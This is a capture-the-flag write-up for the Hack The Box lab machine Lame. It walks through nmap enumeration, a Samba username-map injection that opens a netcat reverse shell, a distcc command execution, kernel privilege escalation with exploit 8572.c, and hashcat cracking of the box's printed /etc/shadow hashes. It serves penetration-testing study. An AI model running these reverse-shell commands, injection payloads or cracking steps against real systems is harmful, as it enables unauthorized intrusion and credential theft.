Linux Boxes

Lame

  1. nmap
    1. all ports
  2. ftp vsftpd
    1. nmap scripts
  3. samba exploit
    1. root through Metasploit
    2. root without Metasploit
      1. /tmp share
      2. reverse shell
      3. potential problem with smbclient 2020 kali
  4. distccd v1 exploit
    1. nmap script .cmd execution
    2. privilege escalation
      1. linux-exploit-suggester-2.pl
      2. dirty cow (failed)
      3. 8572.c (success)
  5. post exploitation password cracking
    1. /etc/shadow
    2. hashes
    3. hashcat
  6. lessons learned

Lame

images/262-1.png
images/262-2.png

nmap

images/263-1.png

all ports

we see from the full port scan that there is a service named distccd on port 3632 which the initial scan missed.
images/264-1.png

running -sV to enumerate the service version and
-sC to run the default scripts against it gives us more info on the service
nmap -p 3632 -sC -sV 10.10.10.3
images/264-2.png
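The full-port sweep followed by a targeted -sC -sV pass is worth turning into a habit. The helper below is an added example (not from the original writeup): stage one scans all 65535 TCP ports with grepable output, stage two runs scripts and version detection only against the ports stage one found open. The grepable output line is constructed to look like Lame's scan so the parser can be exercised offline; the target and output file names are assumptions.

```shell
# Added example: two-stage nmap helper. The sample -oG line below is
# constructed (shaped like Lame's full scan); target/output names are assumed.

# Extract a comma-separated list of open TCP ports from nmap -oG output.
# A -oG "Ports:" field looks like: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//, ...
open_ports_from_grepable() {
    grep '^Host:' "$1" \
        | sed -e 's/^.*Ports: //' -e 's/Ignored State:.*$//' \
        | tr ',' '\n' \
        | awk -F/ '$2 == "open" && $3 == "tcp" { gsub(/^ +/, "", $1); printf "%s%s", sep, $1; sep = "," }'
    echo
}

# Stage 1: fast full-port sweep; stage 2: default scripts and versions on the hits only.
two_stage_scan() {
    target="$1"
    nmap -p- --min-rate 1000 -oG "full-$target.gnmap" "$target" >/dev/null
    ports=$(open_ports_from_grepable "full-$target.gnmap")
    [ -n "$ports" ] || { echo "no open tcp ports found" >&2; return 1; }
    nmap -p "$ports" -sC -sV -oN "targeted-$target.nmap" "$target"
}

# Constructed sample of grepable output, shaped like Lame's full scan,
# so the parser can be checked without a live target.
SAMPLE_GNMAP=$(mktemp)
cat >"$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.80 scan initiated as: nmap -p- -oG full-10.10.10.3.gnmap 10.10.10.3
Host: 10.10.10.3 ()	Status: Up
Host: 10.10.10.3 ()	Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1/, 139/open/tcp//netbios-ssn///, 445/open/tcp//netbios-ssn///, 3632/open/tcp//distccd///	Ignored State: filtered (65530)
# Nmap done
EOF

# Usage against a live box: two_stage_scan 10.10.10.3
```

Running `open_ports_from_grepable "$SAMPLE_GNMAP"` on the constructed file yields `21,22,139,445,3632`, which is exactly the list `two_stage_scan` hands to the second nmap run.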

ftp vsftpd

images/269-1.png
a quick google search reveals that vsftpd 2.3.4 is notorious for a backdoor built into it

images/269-2.png

images/269-3.png

nmap scripts

here's a good way to search through nmap's script database for potential vulnerabilities in the services we've enumerated

ls /usr/share/nmap/scripts/ftp*
where the '*' after 'ftp' serves as a wildcard to list all of nmap's scripts relating to ftp
images/1987-1.png

lets use the ftp-vsftpd-backdoor.nse script to scan Lame's vsftpd 2.3.4 service

nmap --script=/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse -p 21 10.10.10.3
images/1987-2.png


the script reports that the service is not vulnerable to the backdoor we searched for, so this is a rabbit hole

samba exploit

A quick google on the Samba smbd 3.X service reveals there is a command execution Metasploit module we can use to own this box
images/265-1.png



images/265-2.png
images/265-3.png

root through Metasploit

fire up msfconsole, search for exploits named samba and choose the "usermap_script" module

images/266-1.png

root without metasploit

according to the CVE description, Samba 3.0.20 through 3.0.25rc3 with the non-default "username map script" option set passes the supplied username to /bin/sh, so shell metacharacters in a username get executed. the mapping happens before authentication, so no valid credentials are needed (the "remote authenticated users" part of the CVE covers a second vector through the MS-RPC share management functions)
images/1988-1.png

we see we have anonymous access to Lame's smb shares; let's list them first with smbclient
smbclient -L 10.10.10.3
images/1988-2.png

then enumerate what permissions the anonymous user has on each share with smbmap: we have read and write access to the /tmp share!
smbmap -H 10.10.10.3
images/1988-3.png

/tmp share

we see we can list the files within the /tmp share! but that access isn't what we need: for CVE-2007-2447 the injection point is the username sent during session setup, not the files on the share

images/473-1.png

reverse shell

A quick google search on shell metacharacters

images/472-1.png
images/472-2.png

we'll use a netcat backdoor from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
images/472-3.png

We'll send a logon command whose username is a nohup netcat command wrapped in backticks; the username map script hands that string to /bin/sh, which treats the backticks as command substitution and runs our netcat backdoor back to the attack machine
images/472-4.png
logon "/=`nohup nc -nv 10.10.14.62 4444 -e /bin/bash`"
images/472-5.png

start a netcat listener on our machine on port 4444 before running the logon command and we catch the shell as root (smbd itself runs as root, which is why no privilege escalation is needed on this path)!
images/472-6.png

potential problem with smbclient 2020 kali

if you are not using smbclient on Kali 2020, there's no need to heed this warning

trying smbclient against our target host results in the following error message:
images/1989-1.png

some googling turns up a thread about it on reddit
images/1989-2.png


images/1989-3.png

the post suggests adding the parameter "client min protocol" and setting it to NT1 under the [global] section of /etc/samba/smb.conf
images/1989-4.png

smbclient now works!
images/1989-5.png

distccd v1 exploit

images/1990-1.png

images/1990-2.png

let's search nmap's script database for it
ls /usr/share/nmap/scripts/distcc*
images/1990-3.png

nmap script .cmd execution

some nmap scripting engine scripts take arguments via --script-args key=value; the distcc script takes distcc-cve2004-2687.cmd, the command it will have the target run

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.62 5555 -e /bin/bash'"
images/1991-1.png

setting up a reverse shell listener, we pop a shell as user daemon!
images/1991-2.png

privilege escalation

since the distcc exploit only gave us a shell as the daemon user, we'll have to escalate our privileges to root

let's use uname -a to get the kernel version of the victim and run it through a linux privilege escalation suggester script, linux-exploit-suggester-2.pl

find the github here:
images/1992-1.png
images/1992-2.png

now we can check the exploit suggester script against the kernel version of our victim machine; to get the version, run uname -a on the victim, which on Lame reports 2.6.24
images/1992-3.png

linux-exploit-suggester-2.pl

./linux-exploit-suggester-2.pl -k 2.6.24
where -k takes the kernel version and 2.6.24 is the version we extracted through the uname -a command on the victim
images/1993-1.png

images/1993-2.png
images/1993-3.png
images/1993-4.png

dirty cow (failed)

dirty cow (CVE-2016-5195) is usually a reliable exploit but it failed to escalate privileges here; the process is still worth documenting for anyone interested in how to set the exploit up


images/1994-1.png

images/1994-2.png
images/1994-3.png
images/1994-4.png
copy the raw source code over to your attacking machine and name it dirty.c

images/1994-5.png

spin up an http server to serve the exploit to our victim with
python -m SimpleHTTPServer <port>
(on Python 3 the equivalent is python3 -m http.server <port>)
images/1994-6.png
images/1994-7.png


now download the exploit on the victim as our owned daemon user

images/1994-8.png

give the file execute permissions with:
chmod +x <executable>
images/1994-9.png

running it should instantly pop a root shell, but the box is not vulnerable to this exploit
images/1994-10.png

for the record, I have tried running dirty as the makis user as well and ran into the same permission denial, which means Lame was most likely patched to prevent dirty cow from working


8572.c (success)

images/1995-1.png
images/1995-2.png

copy the exploit source out of the exploitdb tree with searchsploit -m linux/local/8572.c
images/1995-3.png

spin up an http server and download 8572.c to our victim machine
images/1995-4.png

images/1995-5.png

as the exploit's usage note states, it wants the PID of udevd's netlink socket, which is listed in /proc/net/netlink (usually the udevd PID minus 1)
images/1995-6.png

running the exploit with the correct udevd PID returns this error:
images/1995-7.png

the exploit executes /tmp/run as root, so we'll need to write that run script to pop a root reverse shell back to our attack machine
we'll use echo to write the same pentest monkey netcat reverse shell into /tmp/run
images/1995-8.png


images/1995-9.png

start a listener on the port you specified in your run script and spawn a root shell!
images/1995-10.png

post exploitation password cracking

testing out hashcat for fun on Lame's password hashes to see if we can crack them

/etc/shadow


root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::

hashes

$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0
$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.
$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0
$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.
$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/
$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.

hashcat

images/272-1.png
images/272-2.png
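The hash list above was pulled out of the shadow file by hand. The functions below are an added example (not from the original writeup) that do the same selection with awk and then feed the result to hashcat: field 2 of a shadow line is the password hash, `*` and `!` mean the account has no usable password and can be skipped, and the `$1$` prefix is md5crypt, which is hashcat mode 500. The sample is a shortened copy of Lame's shadow file from this page; the wordlist path is an assumption.

```shell
# Added example: extract crackable shadow entries and run them through hashcat.
# The sample shadow lines are copied from this writeup; the wordlist is assumed.

# Emit user:hash for every account whose password field is an actual hash
# ("*" and anything starting with "!" are disabled or locked accounts).
crackable_hashes() {
    awk -F: '$2 != "" && $2 != "*" && $2 !~ /^!/ { print $1 ":" $2 }' "$1"
}

# Number of crackable accounts, a quick sanity check before starting a job.
crackable_count() {
    crackable_hashes "$1" | wc -l | tr -d ' '
}

# md5crypt is mode 500; --username makes hashcat accept the user:hash format
# and --show maps cracked passwords back to account names afterwards.
crack_shadow() {
    shadow="$1"; wordlist="${2:-/usr/share/wordlists/rockyou.txt}"
    crackable_hashes "$shadow" > lame.hashes
    hashcat -m 500 -a 0 --username lame.hashes "$wordlist"
    hashcat -m 500 --username --show lame.hashes
}

# Shortened copy of Lame's /etc/shadow, enough to exercise the filter offline.
SAMPLE_SHADOW=$(mktemp)
cat >"$SAMPLE_SHADOW" <<'EOF'
root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::
daemon:*:14684:0:99999:7:::
sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::
libuuid:!:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::
mysql:!:14685:0:99999:7:::
service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::
makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::
EOF

# Usage: crack_shadow /path/to/shadow [wordlist]
```

On the sample, `crackable_count` reports 6, matching the six hashes listed above; keeping the username in the file is what lets `--show` tell you which account each cracked password belongs to.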

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1950-1.png